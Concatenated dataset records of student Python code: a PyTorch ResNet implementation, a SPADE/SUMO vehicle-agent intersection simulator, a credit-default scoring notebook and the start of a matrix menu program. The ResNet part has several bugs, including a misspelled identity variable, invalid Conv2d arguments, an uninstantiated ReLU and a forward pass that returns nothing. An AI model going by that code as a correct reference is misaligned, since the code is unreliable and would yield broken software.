forward(self,x):\n identity = x # identity为特征矩阵\n if self.downsample is not None:\n indentity = self.downsample(x)\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out += indentity # 最后将主分支和残差分支的特征矩阵相加\n out = self.relu(out) # 残差结构最后一次先将特征矩阵相加,然后再是要激活函数\n\n return out\n\n\nclass Bottleneck(nn.Module): # 50层,101层,152层\n expansion = 4 # 残差结构的第三层卷积核个数是第一层的4倍\n\n def __init__(self, in_channel, out_channle, stride=1,downsamplle=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_channel=in_channel,out_channels=out_channle,kernel_size=1,stride=1,bias=False)\n self.bn1 = nn.BatchNorm2d(out_channle)\n\n self.conv2 = nn.Conv2d(in_channel=out_channle,out_channels=out_channle, kernel_size=3,padding=1,stride=1,bias=False)\n self.bn2 = nn.BatchNorm2d(out_channle)\n\n # 残差结够最后一层的卷积核个数是第一层的4倍,所以输出个数也是第一层的4倍 但无论怎样最终输出一个特征矩阵,包含了一个batch多张图片的信息\n self.conv3 = nn.Conv2d(in_channel=out_channle,out_channels=out_channle*self.expansion,kernel_size=1,stride=1,bias=False)\n self.bn3 = nn.BatchNorm2d(out_channle*self.expansion)\n\n self.relu = nn.ReLU\n self.downsample = downsamplle\n\n def forward(self,x):\n identity = x\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self,block, block_num, num_classes=1000,includ_top=True):\n # block是根据我们的层数选用不同的残差结构,class_num是一个列表,返回的是不同层(conv2_x,conv3_x,conv4_x)使用的残差结构的数目\n super(ResNet, self).__init__()\n self.include_top = includ_top\n self.in_channel = 64 # 残差结构的输入通道为64,不是刚开始加载图片的通道,刚开始的RGB图像的通道为3\n\n self.conv1 = nn.Conv2d(3,out_channels=self.in_channel,kernel_size=7,stride=2,padding=3,bias=False)\n self.bn1 = nn.BatchNorm2d(self.in_channel)\n self.relu = nn.ReLU\n self.maxpool = nn.MaxPool2d(kernel_size=3,stride=2,padding=1)\n\n self.layer1 = self.make_layer(block,64,block_num[0]) # 对应笔记的conv2-x 64代表第一层输出64通道\n self.layer2 = self.make_layer(block, 128, block_num[1], stride=2) # 对应笔记的conv3-x 第一层输出128通道\n self.layer3 = self.make_layer(block, 256, block_num[2], stride=2) # 对应笔记的conv4-x 第一层输出256通道\n self.layer4 = self.make_layer(block, 512, block_num[3], stride=2) # 对应笔记的conv5-x 第一层输出512通道\n\n if self.include_top:\n self.avgpool = nn.AdaptiveAvgPool1d((1,1)) # 平均池化\n self.fc = nn.Linear(512*block.expansion,num_classes)\n\n for m in self.modules():\n if isinstance(m,nn.Conv2d):\n nn.init.kaiming_normal(m.weight,mode='fan_out',nonlinearity=True)\n def _make_layer(self,block,channel,block_num,stride=1):\n # block根据层数不同,选择少层数的残差结构或多层数的残差结构\n # channel是conv2_x或conv3_x或conv4_x或conv5_x的第一层卷积核的个数,也即是输出通道个数\n # block_num就是一列表,对应conv2_x或conv3_x或conv4_x或conv5_x各自的层数\n downsample = None\n if stride !=1 or self.in_channel != channel * block.expansion: # 18层和34层跳过该语句,50,101层进入该语句,进行下采样\n # self.in_channel固定了64,而18和34层对应expansion=1,onv2_x或conv3_x或conv4_x或conv5_x第一层和最后一层卷积核个数相等,也即输出通道相等\n # 而50和101层,对应expansion=1,conv2_x或conv3_x或conv4_x或conv5_x,最后一层的卷积核个数是第一层的4倍\n downsample = nn.Sequential(\n nn.Conv2d(self.in_channel,channel*block.expansion,kernel_size=1,stride=stride,bias=False),\n # 下采样只升维或降维,改变深度,不改变高和宽,所以kernel_size=1,stride=stride=1\n nn.BatchNorm2d(channel*block.expansion)\n )\n\n layers = []\n layers.append((block(self.in_channel,channel,downsample=downsample,stride=stride)))\n self.in_channel = channel * block.expansion # 18层和34层不会改变,50和101层, conv2_x或conv3_x或conv4_x或conv5_x,最后一层的卷积核个数是第一层的4倍\n\n for _ in range(1,block_num): # 构建实线残差结构部分\n layers.append(block(self.in_channel))\n\n return nn.Sequential(*layers)\n\n def forward(self,x):\n x = self.conv1(x) # 第一层卷积层\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x) # 进入残差结构 分别对应conv2_x或conv3_x或conv4_x或conv5_x,\n x =self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n if self.include_top:\n x = self.avgpool(x)\n x = torch.flatten(x,1) # 传递给线性层之前进行扁平化操作\n x = self.fc(x)\n\n\ndef resent34(num_classes=1000,include_top=True): # 34层ResNet\n return ResNet(BasicBlock,[3,4,6,3],num_classes=num_classes,include_top=include_top)\n\ndef resent101(num_classes=1000,include_top=True): # 101层ResNet\n return ResNet(Bottleneck,[3,4,23,3],num_classes=num_classes,include_top=include_top)","repo_name":"spasmodic123/QG_SUMMER_CAMP","sub_path":"Daily/2023.7.16/code/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4630126824","text":"# -*- coding: utf-8 -*-\n\n# sumo imports\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport subprocess\nimport random\nimport sys\nimport getopt\nimport os\nfrom optparse import OptionParser\n\n# spade imports\nimport spade\nimport time\nimport ast\n\nhost = \"127.0.0.1\"\nfile = open('log.txt', 'a')\nsys.stdout = file\n\n\"\"\"\nAgente que representa um veículo.\n\"\"\"\nclass VehicleAgent(spade.Agent.Agent):\n\n \"\"\"\n Construtor\n \"\"\"\n def __init__(self, ip, _pass, origin, destination, debug):\n spade.Agent.Agent.__init__(self, ip, _pass)\n self.debug = debug\n self.origin = origin\n self.destination = destination\n self.neighbours = []\n self.nb_pref = {}\n self.change_direction = True if origin != destination else False\n self.norm_right = False\n self.rightOfWay = False\n\n self.vehicle_ID = None\n self.vehicle_angle = None\n self.vehicle_signals = None\n self.vehicle_left_blink = None\n self.vehicle_right_blink = None\n self.vehicle_state = \"\"\n\n def _setup(self):\n\n self.STATE_ZERO_CODE = 0\n self.STATE_ONE_CODE = 1\n self.STATE_TWO_CODE = 2\n self.STATE_THREE_CODE = 3\n self.STATE_FOUR_CODE = 4\n self.STATE_FIVE_CODE = 5\n self.STATE_SIX_CODE = 6\n self.STATE_SEVEN_CODE = 7\n\n self.TRANSITION_TO_ZERO = 00\n self.TRANSITION_TO_ONE = 10\n self.TRANSITION_TO_TWO = 20\n self.TRANSITION_TO_THREE = 30\n self.TRANSITION_TO_FOUR = 40\n self.TRANSITION_TO_FIVE = 50\n self.TRANSITION_TO_SIX = 60\n self.TRANSITION_TO_SEVEN = 70\n self.TRANSITION_DEFAULT = 1000\n\n fsm = spade.Behaviour.FSMBehaviour()\n\n fsm.registerFirstState(self.StartBehaviour(), self.STATE_ZERO_CODE)\n fsm.registerState(self.ArriveBehaviour(), self.STATE_ONE_CODE)\n fsm.registerState(self.HelloBehaviour(), self.STATE_TWO_CODE)\n fsm.registerState(self.WaitBehaviour(), self.STATE_THREE_CODE)\n fsm.registerState(self.DecideBehaviour(), self.STATE_FOUR_CODE)\n fsm.registerState(self.DecideToStayBehaviour(), self.STATE_FIVE_CODE)\n fsm.registerState(self.DecideToGoBehaviour(), self.STATE_SIX_CODE)\n fsm.registerLastState(self.GoneBehaviour(), self.STATE_SEVEN_CODE)\n\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ZERO_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ZERO_CODE, self.TRANSITION_TO_ZERO)\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ONE_CODE, self.TRANSITION_TO_ONE)\n\n fsm.registerTransition(self.STATE_ONE_CODE, self.STATE_ONE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_ONE_CODE, self.STATE_TWO_CODE, self.TRANSITION_TO_TWO)\n\n fsm.registerTransition(self.STATE_TWO_CODE, self.STATE_TWO_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_TWO_CODE, self.STATE_THREE_CODE, self.TRANSITION_TO_THREE)\n\n fsm.registerTransition(self.STATE_THREE_CODE, self.STATE_THREE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_THREE_CODE, self.STATE_FOUR_CODE, self.TRANSITION_TO_FOUR)\n\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_FOUR_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_FIVE_CODE, self.TRANSITION_TO_FIVE)\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_SIX_CODE, self.TRANSITION_TO_SIX)\n\n fsm.registerTransition(self.STATE_FIVE_CODE, self.STATE_FIVE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_FIVE_CODE, self.STATE_TWO_CODE, self.TRANSITION_TO_TWO)\n\n fsm.registerTransition(self.STATE_SIX_CODE, self.STATE_SIX_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_SIX_CODE, self.STATE_SEVEN_CODE, self.TRANSITION_TO_SEVEN)\n\n self.addBehaviour(fsm, None)\n\n template = spade.Behaviour.ACLTemplate()\n # template.setSender(spade.AID.aid(\"car1@\" + host, [\"xmpp://car1@\" + host]))\n template.setOntology(\"Car2X\")\n template.setProtocol(\"WAVE\")\n t = spade.Behaviour.MessageTemplate(template)\n self.addBehaviour(self.RecvMsgBehaviour(), t)\n\n\n def getVehicleState(self):\n return self.vehicle_state\n\n \"\"\"\n Coleta dados do SUMO para auxiliar o mecanismo de decisão do agente.\n \"\"\"\n def collectSumoData(self, vehID, data):\n\n self.vehicle_ID = vehID\n self.vehicle_angle = round(data[tc.VAR_ANGLE], 2)\n\n self.vehicle_signals = '{:013b}'.format(data[tc.VAR_SIGNALS]) # Got vehicle signals from http://sumo.dlr.de/wiki/TraCI/Vehicle_Signalling\n\n self.vehicle_right_blink = bool(int(self.vehicle_signals[12]))\n self.vehicle_left_blink = bool(int(self.vehicle_signals[11]))\n\n \"\"\"\n Adiciona vizinhos para envio de mensagens.\n \"\"\"\n def addNeighbour(self, neighbour):\n self.neighbours.append(neighbour)\n\n \"\"\"\n Verifica se posição de vizinho está à direita.\n \"\"\"\n def checkRightSide(self, direction):\n\n self.carAtRight = None\n\n if self.origin == direction:\n self.carAtRight = False\n else:\n if self.origin == \"NORTH\":\n self.carAtRight = True if direction == \"WEST\" else False\n elif self.origin == \"SOUTH\":\n self.carAtRight = True if direction == \"EAST\" else False\n elif self.origin == \"WEST\":\n self.carAtRight = True if direction == \"SOUTH\" else False\n elif self.origin == \"EAST\":\n self.carAtRight = True if direction == \"NORTH\" else False\n\n return self.carAtRight\n\n \"\"\"\n Verifica se o vizinho vai mudar de direção\n \"\"\"\n def checkChangeDirection(self, origin, destination):\n\n if origin != destionation:\n return True\n else:\n return False\n\n \"\"\"\n Prepara mensagem a ser enviada por agente.\n \"\"\"\n def prepareMessage(self, status):\n self.msg = spade.ACLMessage.ACLMessage()\n self.msg.setPerformative(\"inform\")\n self.msg.setLanguage(\"OWL-S\")\n self.msg.setOntology(\"Car2X\")\n self.msg.setProtocol(\"WAVE\")\n self.content = \"{'status':'\"+ status + \"','from':'\" + self.origin + \"','to':'\" + self.destination + \"'}\"\n self.msg.setContent(self.content)\n\n return self.msg\n\n def removeNeighbour(self, neighbour):\n self.neighbours.pop(neighbour)\n\n \"\"\"\n Comportamento de recebimento de mensagens.\n \"\"\"\n class RecvMsgBehaviour(spade.Behaviour.EventBehaviour):\n\n def _process(self):\n msg = self._receive(True, None)\n\n self.content = ast.literal_eval(msg.getContent())\n self.status = self.content['status']\n self.origin = self.content['from']\n self.dest = self.content['to']\n\n if msg.getSender() in self.myAgent.neighbours:\n\n if self.status == \"COMING\":\n self.myAgent.rightOfWay = False\n self.myAgent.nb_pref[msg.getSender().getName()] = False\n # print(str(self.myAgent.getName()) + \"| Got message COMING from \" + msg.getSender().getName() + \". It is crossing now.\")\n\n elif self.status == \"WAITING\":\n\n self.right_position = self.myAgent.checkRightSide(self.origin)\n self.change_direction = self.origin != self.dest\n\n # Trata vizinhos que estiverem à direita\n if not self.right_position:\n self.myAgent.nb_pref[msg.getSender().getName()] = True\n else:\n self.myAgent.nb_pref[msg.getSender().getName()] = True if self.change_direction else False\n\n # print(str(self.myAgent.getName()) + \"| Got message WAITING from \" + msg.getSender().getName() + \". My right-of-way compared to it is \" + self.myAgent.nb_pref[msg.getSender().getName()] + \".\")\n\n else: # self.status == \"GONE\"\n self.myAgent.nb_pref.pop(msg.getSender().getName())\n # print(str(self.myAgent.getName()) + \"| Got message GONE from \" + msg.getSender().getName() + \". It has gone.\")\n\n if bool(self.myAgent.nb_pref):\n if self.myAgent.change_direction:\n self.myAgent.rightOfWay = False\n # print(str(self.myAgent.getName()) + \"| I'm about to make a turn and other car(s) have right-of-way.\")\n else:\n self.myAgent.rightOfWay = False if False in self.myAgent.nb_pref.values() else True\n # print(str(self.myAgent.getName()) + \"| I have right-of-way.\")\n else:\n self.myAgent.rightOfWay = True\n # print(str(self.myAgent.getName()) + \"| I'm about to make a turn and I have right-of-way.\")\n\n # if self.myAgent.debug:\n # print str(self.myAgent.getName()) + \"| Messagem from \" + str(msg.getSender().getName()) + \". Status \" + self.status + \" Origin \" + self.origin + \". Right of way is \" + str(self.right) + \". General right of way is \" + str(self.myAgent.rightOfWay) + \".\"\n # print self.myAgent.nb_pref\n\n \"\"\"\n Comportamento de criação de veículo no SUMO\n \"\"\"\n class StartBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"start\"\n if self.myAgent.vehicle_ID != None:\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Starting Behaviours.\")\n # file.flush()\n self._exitcode = self.myAgent.TRANSITION_TO_ONE\n else:\n self._exitcode = self.myAgent.TRANSITION_TO_ZERO\n\n \"\"\"\n Comportamento de chegada de veículos ao cruzamento.\n \"\"\"\n class ArriveBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"arrive\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Arriving at crossing.\")\n\n time.sleep(1)\n self._exitcode = self.myAgent.TRANSITION_TO_TWO\n\n \"\"\"\n Comportamento que envia mensagem de interesse em atravessar o cruzamento.\n \"\"\"\n class HelloBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"hello\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Sending message.\")\n # file.flush()\n\n ######## send Message \"Waiting\" ########\n self.msg = self.myAgent.prepareMessage(\"WAITING\")\n for receiver in self.myAgent.neighbours:\n self.msg.addReceiver(receiver)\n self.myAgent.send(self.msg)\n #######################################\n time.sleep(1)\n self._exitcode = self.myAgent.TRANSITION_TO_THREE\n\n \"\"\"\n Comportamento que aguarda mensagens de outros agentes carros.\n \"\"\"\n class WaitBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"wait\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Waiting.\")\n # file.flush()\n\n time.sleep(1)\n # print str(self.myAgent.getName()) + \"| Waiting time is over.\"\n self._exitcode = self.myAgent.TRANSITION_TO_FOUR\n\n\n \"\"\"\n Comportamento que contém o mecanismo de decisão que pode escolher (aguardar\n ou atravessar) baseando-se nas normas e nas mensagens recebidas.\n \"\"\"\n class DecideBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"decide\"\n if self.myAgent.debug:\n print(str(self.myAgent.getName()) + \"| Deciding.\")\n # file.flush()\n time.sleep(3)\n # if permission_to_go && norms_checked\n\n\n if self.myAgent.rightOfWay :\n self._exitcode = self.myAgent.TRANSITION_TO_SIX\n else:\n self._exitcode = self.myAgent.TRANSITION_TO_FIVE\n\n \"\"\"\n Comportamento que dispara mensagem e espera para atravessar.\n \"\"\"\n class DecideToStayBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"stay\"\n if self.myAgent.debug:\n print(str(self.myAgent.getName()) + \"| Staying.\")\n\n time.sleep(1)\n # if self.myAgent.getName() == \"car1@127.0.0.1\":\n self.myAgent.permission_to_go = True\n self._exitcode = self.myAgent.TRANSITION_TO_TWO\n\n \"\"\"\n Comportamento que dispara mensagem e atravessa o cruzamento.\n \"\"\"\n class DecideToGoBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"go\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Coming.\")\n\n ######## send Message \"Coming\" ########\n self.msg = self.myAgent.prepareMessage(\"COMING\")\n for receiver in self.myAgent.neighbours:\n self.msg.addReceiver(receiver)\n self.myAgent.send(self.msg)\n #######################################\n time.sleep(2)\n self._exitcode = self.myAgent.TRANSITION_TO_SEVEN\n\n \"\"\"\n Comportamento que dispara mensagem e conclui a travessia do cruzamento.\n \"\"\"\n class GoneBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"gone\"\n if self.myAgent.debug:\n print(str(self.myAgent.getName()) + \"| Crossing complete.\")\n # file.flush()\n\n ######## send Message \"Gone\" ##########\n self.msg = self.myAgent.prepareMessage(\"GONE\")\n for receiver in self.myAgent.neighbours:\n self.msg.addReceiver(receiver)\n self.myAgent.send(self.msg)\n #######################################\n\n time.sleep(3)\n self._exitcode = self.myAgent.TRANSITION_TO_DEFAULT\n self.myAgent._kill()\n\n\ntry: # we need to import python modules from the $SUMO_HOME/tools directory\n sys.path.append(os.path.join(os.path.dirname(\n __file__), '..', '..', '..', '..', \"tools\")) # tutorial in tests\n sys.path.append(os.path.join(os.environ.get(\"SUMO_HOME\", os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"..\")), \"tools\")) # tutorial in docs\n from sumolib import checkBinary # noqa\nexcept ImportError:\n sys.exit(\n \"please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should contain folders 'bin', 'tools' and 'docs')\")\n\nimport traci\nimport traci.constants as tc\n\n\ndef runSumo():\n\n sumoBinary = \"/home/lauro/Documentos/Mestrado/T3/sumo/sumo-0.32.0/bin/sumo-gui\"\n sumoCmd = [sumoBinary, \"-c\", \"../sumo/cross.sumocfg\"]\n\n # SUMO Magic\n traci.start(sumoCmd)\n junctionID = \"0\"\n traci.junction.subscribeContext(junctionID, tc.CMD_GET_VEHICLE_VARIABLE, 15, [tc.VAR_SPEED, tc.VAR_ANGLE, tc.VAR_SIGNALS, tc.VAR_EDGES])\n\n # for step in range(100):\n while traci.simulation.getMinExpectedNumber() > 0:\n # print(step)\n traci.simulationStep()\n data = traci.junction.getContextSubscriptionResults(junctionID)\n\n if str(type(data)) == \"\":\n for car in data:\n agent = agents[car]\n agent.collectSumoData(car, data[car])\n\n\n if agent.getVehicleState() == \"start\":\n traci.vehicle.setSpeed(car, 0)\n elif agent.getVehicleState() == \"wait\":\n traci.vehicle.setSpeed(car, 0)\n elif agent.getVehicleState() == \"go\":\n traci.vehicle.setSpeed(car, -1)\n\n file.close()\n traci.close()\n\n\nif __name__== \"__main__\":\n\n# As normas em cruzamento de veículos sempre acabam dependendo da sinalização (vertical/horizontal) para auxiliar a tomada de decisão no trânsito.\n# Para 3 carros\n# A norma da preferência de quem estiver a direita resolve a definição de prioridade.\n# Para 2 carros\n# A norma da preferência a direita resolve a definição de prioridade em 4 dos 6 casos.\n# Para os carros em paralelo, pode-se usar a norma da mudança de direção. (o que muda de direção perde a prioridade)\n# Para os carros em paralelo, não é necessário usar norma de prioridade se ambos estão em faixas diferentes e vão para direções opostas.\n# Para carros em paralelo mudando de direção para o mesmo destino, não sei como priorizar.\n# Para 4 carros\n\n\n # Caso Base\n# Preferencia red, pink, yellow\n red = VehicleAgent(\"red\" + \"@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n pink = VehicleAgent(\"pink\" + \"@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n yellow = VehicleAgent(\"yellow\" + \"@\" + host, \"secret\", \"SOUTH\", \"SOUTH\", True)\n\n# Preferencia pink, yellow, red\n # red = VehicleAgent(\"red@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n # yellow = VehicleAgent(\"yellow@\" + host, \"secret\", \"NORTH\", \"NORTH\", True)\n # pink = VehicleAgent(\"pink@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n\n# Preferencia red, yellow, pink\n # red = VehicleAgent(\"red@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n # pink = VehicleAgent(\"pink@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n # yellow = VehicleAgent(\"yellow@\" + host, \"secret\", \"SOUTH\", \"SOUTH\", True)\n\n # Collecting values from simulation models to feed agent decision mechanism\n agents = {\"red\":red, \"pink\":pink, \"yellow\":yellow}\n\n red.addNeighbour(pink.getAID())\n red.addNeighbour(yellow.getAID())\n\n pink.addNeighbour(red.getAID())\n pink.addNeighbour(yellow.getAID())\n\n yellow.addNeighbour(red.getAID())\n yellow.addNeighbour(pink.getAID())\n\n red.start()\n pink.start()\n yellow.start()\n\n # red.wui.start()\n # pink.wui.start()\n # yellow.wui.start()\n\n # red.setDebugToScreen()\n # pink.setDebugToScreen()\n # yellow.setDebugToScreen()\n\n runSumo()\n","repo_name":"laurodelacerda/vehicularAgents","sub_path":"spade/sumoVehicleAgent.py","file_name":"sumoVehicleAgent.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7057970249","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importar pacotes necessários\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn import preprocessing\npd.options.display.max_columns = None\n#pd.options.display.max_rows = None\nplt.rc(\"font\", size=14)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_auc_score, roc_curve\nimport pandas_profiling\nimport warnings\nwarnings.filterwarnings(action=\"ignore\")\n\n\n# In[2]:\n\n\n# Carregar o conjunto de dados históricos dos clientes\n#df = pd.read_csv('dataset_all.csv').sample(100000, random_state=44)\ndf = pd.read_csv('dataset_all.csv')\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# In[4]:\n\n\ndf.dtypes\n\n\n# In[5]:\n\n\ndf.shape\n\n\n# In[6]:\n\n\n#missing data\ntotal = df.isnull().sum().sort_values(ascending=False)\npercent = (df.isnull().sum()/df.isnull().count()).sort_values(ascending=False)\nmissing_data = pd.concat([total, percent], axis=1, keys=['Total', 'Percent'])\nmissing_data\n\n\n# In[7]:\n\n\ndf.drop(['ID da conta','tipo pessoa','é flexível no limite','data de vencimento - credito','é Prestação - credito','data de vencimento - financiamento','data de vencimento - emprestimo' ,'ID de consentimento','transações de valor - credito' ,'quantia - conta','Valor do pagamento - credito','data de pagamento - credito'], inplace=True, axis=1)\n\n\n# In[8]:\n\n\ndf\n\n\n# In[9]:\n\n\n#verifica se é inadimplente\ndf['divida_total'] = df[['valor total da fatura - credito', 'saldo pendente do contrato - financiamento', 'saldo pendente do contrato - emprestimo']].sum(axis=1)\ndf['divida_atrasada'] = df[['Prestações devidas - emprestimo', 'Prestações devidas - financiamento']].sum(axis=1)\ndf['utilizacao_limite_cartao'] = df['Valor limite - credito'] / df['cheque especial Limite contratado']\n\ndf['utilizacao_limite_cartao'].replace([np.inf, -np.inf], -1, inplace=True)\ndf['utilizacao_limite_cartao'].replace([np.NaN], 0, inplace=True)\n\ndf['limite_negativo'] = 0\n\ndef verifica_limite(x):\n if x >= 0:\n return 0\n else:\n return 1\n\ndef verifica_inadimp(x,y): \n if (x > 0) and (y == 1):\n return 1\n else:\n return 0\n\n\n# In[10]:\n\n\n#analise_2 = df[['Valor limite - credito','cheque especial Limite contratado']]\n\n\n# In[11]:\n\n\n#analise_3 = df[df['Valor limite - credito'] <= 0]\n\n\n# In[12]:\n\n\ndf['limite_negativo'] = df['utilizacao_limite_cartao'].apply(verifica_limite)\n\n\n# In[13]:\n\n\ndf['eh_inadimplente'] = np.vectorize(verifica_inadimp)(df['divida_atrasada'], df['limite_negativo'])\n\n\n# In[14]:\n\n\ndf['limite_negativo'].value_counts()\n\n\n# In[15]:\n\n\ndf['eh_inadimplente'].value_counts()\n\n\n# In[16]:\n\n\n'''\nfrom imblearn.over_sampling import SMOTE\nimport numpy as np\n\nSEED=42\n\nsmote = SMOTE(random_state=42)\n'''\n\n\n# In[17]:\n\n\ncount_majority_class, count_minority_class = df.eh_inadimplente.value_counts()\n\n\n# In[18]:\n\n\ncount_majority_class\n\n\n# In[19]:\n\n\ndf_majority_class = df[df['eh_inadimplente'] == 0]\ndf_minority_class = df[df['eh_inadimplente'] == 1]\n\n\n# In[20]:\n\n\ndf_class_undersample = df_majority_class.sample(count_minority_class)\n\n\n# In[21]:\n\n\ndf_balanced = pd.concat([df_class_undersample, df_minority_class], axis=0)\n\n\n# In[22]:\n\n\nprint('Number of data samples after under-sampling:')\nprint(df_balanced.eh_inadimplente.value_counts())\n\n\n# In[23]:\n\n\n#smote_technique = SMOTE(sampling_strategy='minority')\n\n\n# In[24]:\n\n\nX = df_balanced.drop(\"eh_inadimplente\", axis=1)\nY = df_balanced[\"eh_inadimplente\"]\n\n\n# In[25]:\n\n\n#x_resampled, y_resampled = smote_technique.fit_resample(X, Y)\n\n\n# In[26]:\n\n\n#df_balanced = pd.concat([y_resampled, x_resampled], axis=1)\n#df_balanced\n\n\n# In[27]:\n\n\ndf_balanced[\"eh_inadimplente\"].value_counts()\n\n\n# In[28]:\n\n\n#x = df_balanced.iloc[:, 1:].values\n#y = df_balanced.iloc[:, 0].values\n\n\n# In[29]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X,Y, test_size=0.2, random_state=42)\n\n\n# In[30]:\n\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n# Padronizar as variáveis numéricas\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[31]:\n\n\n# Treinar o modelo de regressão logística\nmodelo = LogisticRegression()\n#modelo = RandomForestClassifier(max_depth= 5, random_state = 42) \nmodelo.fit(X_train, y_train)\n\n\n# In[32]:\n\n\ny_test\n\n\n# In[33]:\n\n\nacuracia = modelo.score(X_test, y_test)\nprint('Acurácia:', acuracia)\n\n\n# In[34]:\n\n\n# Gerar o score para cada cliente\n#score = modelo.predict_proba(X_test)[:, 1].round()\nscore = modelo.predict_proba(X_test)[:, 1]\n\n\n# In[35]:\n\n\n#from sklearn import metrics\n'''\nprint(\"Acurácia:\",metrics.accuracy_score(y_test, score))\nprint(\"Precisão:\",metrics.precision_score(y_test, score))\nprint(\"Recall:\",metrics.recall_score(y_test, score)) \nprint(\"F1:\",metrics.f1_score(y_test, score))\n'''\n\n\n# In[36]:\n\n\nscore\n\n\n# In[37]:\n\n\n# Fornecer produtos financeiros com base no score gerado e nas variáveis adicionais\nproduto_oferecido = np.where((score >= 0.8), 'Empréstimo Pessoal', np.where((score >= 0.5) , 'Cartão de Crédito', np.where((score >= 0.2) , 'Conta Corrente', 'Sem Oferta')))\n\n\n# In[38]:\n\n\nproduto_oferecido.shape\n\n\n# In[39]:\n\n\nproduto_oferecido\n\n\n# In[40]:\n\n\ndf_teste = pd.DataFrame(produto_oferecido, columns = ['produto_oferecido'])\n\n\n# In[41]:\n\n\ndf_teste\n\n\n# In[42]:\n\n\n#produtos ofertados\ndf_teste['produto_oferecido'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rodrigo-Henrique21/Machine-Learning-Hackathon-Bradesco","sub_path":"model_bradesco_hacka.py","file_name":"model_bradesco_hacka.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28767698639","text":"# Вариант 4,2\n\n# Программа предназначена для выполнения действий с матрицей\n\n# Входные данные: номер команды, который стоит применить к матрице\n\n# Выходные данные: проделывание операции с матрицей\n\n\n# Функция проверки на int\ndef str_is_int(massive_item):\n if len(massive_item) == 0:\n return False\n if massive_item == '0':\n return True\n length = len(massive_item)\n if length >= 2 and massive_item[:2] == '-0':\n return False\n for i in range(length):\n # Если начинается с 0, то неверный ввод\n if i == 0 and massive_item[i] == '0':\n return False\n # Проверка на знаки, отличные от '-', '.'\n if not massive_item[i].isdecimal():\n # Если '-' первый символ, то это просто число\n if massive_item[i] == '-' and i == 0 and not length == 1:\n continue\n # Все остальное некорректный ввод\n else:\n return False\n return True\n\n\n# Инициализация переменных\nmassive = []\nflag = True\n\nwhile flag:\n # Меню\n 